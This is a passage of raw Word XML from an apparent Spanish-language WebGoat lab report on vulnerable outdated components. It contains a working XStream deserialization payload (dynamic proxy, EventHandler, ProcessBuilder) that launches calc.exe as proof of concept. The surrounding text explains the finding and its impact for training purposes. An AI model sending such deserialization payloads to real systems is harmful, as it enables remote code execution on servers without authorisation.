        <w:t>En WebGoat, se identificó que el servidor utiliza componentes obsoletos con vulnerabilidades conocidas. Esto permite a los atacantes explotar estos fallos para comprometer la aplicación o el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB0359" w14:textId="66B2A98B" w:rsidR="007E2074" w:rsidRDefault="007E2074" w:rsidP="007E2074">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E2074">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por ejemplo, una biblioteca Java obsoleta puede tener vulnerabilidades críticas que permitan ataques de ejecución remota de código o escalamiento de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76171186" w14:textId="1F593AAE" w:rsidR="001C22CB" w:rsidRPr="001C22CB" w:rsidRDefault="001C22CB" w:rsidP="001C22CB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C22CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Impacto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E083691" w14:textId="77777777" w:rsidR="001C22CB" w:rsidRPr="001C22CB" w:rsidRDefault="001C22CB" w:rsidP="001C22CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C22CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Compromiso del sistema por exploits conocidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22404D" w14:textId="77777777" w:rsidR="001C22CB" w:rsidRPr="001C22CB" w:rsidRDefault="001C22CB" w:rsidP="001C22CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C22CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pérdida de datos confidenciales debido a brechas de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1F3A25" w14:textId="0B4759C8" w:rsidR="001C22CB" w:rsidRDefault="001C22CB" w:rsidP="001C22CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C22CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Escalamiento de ataques mediante la explotación de dependencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4BF8E4" w14:textId="12EA3394" w:rsidR="001C22CB" w:rsidRDefault="001C22CB" w:rsidP="001C22CB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC975A7" w14:textId="6CEE356E" w:rsidR="001C22CB" w:rsidRDefault="001C22CB" w:rsidP="001C22CB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prueba realizada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A200EA" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La deserialización del XML por parte de XStream convirtió el XML en un objeto Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A0152" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Durante este proceso, se creó un objeto ProcessBuilder que intentó ejecutar el comando especificado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0919F92E" w14:textId="1DA91135" w:rsidR="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El sistema, vulnerable a deserialización insegura, ejecutó el programa calc.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05E7D5" w14:textId="3EDC1CF8" w:rsidR="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73CED968" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>contact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dynamic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-proxy'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617758B3" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;interface&gt;org.owasp.webgoat.lessons.vulnerablecomponents.Contact&lt;/interface&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A92B6DA" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>java.beans.EventHandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D8B49" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>java.lang.ProcessBuilder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50552AF0" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D1499" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;calc.exe&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EC2281" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F45827" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE686DD" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0BD0E" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D503122" w14:textId="0CF183CD" w:rsidR="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>contact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008732D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6AEBC2" w14:textId="77777777" w:rsidR="0008732D" w:rsidRPr="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9B488C" w14:textId="12D7B0B8" w:rsidR="0008732D" w:rsidRDefault="0008732D" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
